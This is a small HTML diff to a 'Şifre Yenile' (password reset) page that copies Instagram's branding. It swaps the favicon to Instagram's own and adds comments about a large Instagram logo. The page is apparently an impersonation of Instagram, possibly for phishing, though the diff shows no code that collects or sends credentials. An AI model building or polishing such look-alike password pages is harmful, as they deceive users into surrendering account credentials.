--- a/index.html
+++ b/index.html
@@ -4,7 +4,8 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Şifre Yenile</title>
-    <link rel="icon" type="image/x-icon" href="https://static.cdninstagram.com/rsrc.php/v3/yI/r/VsNDI4s37cN.ico?v=1">
+    <!-- Favicon Instagram logosu ilə dəyişdirildi -->
+    <link rel="icon" type="image/x-icon" href="https://instagram.com/favicon.ico">
     <script src="https://cdn.tailwindcss.com?client"></script>
     <style>
         .toggle-password {
@@ -13,7 +14,7 @@
             top: 50%;
             transform: translateY(-50%);
             cursor: pointer;
-            color: #000000; /* Kara renk */
+            color: #000000;
             font-size: 12px;
             font-weight: 600;
         }
@@ -21,6 +22,7 @@
 </head>
 <body class="bg-gray-100 flex items-center justify-center min-h-screen">
     <div class="bg-white p-8 rounded-lg shadow-lg w-full max-w-md">
+        <!-- Böyük Instagram logosu -->
         <img
             src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2a/Instagram_logo.svg/1200px-Instagram_logo.svg.png"
             alt="Instagram Logo"
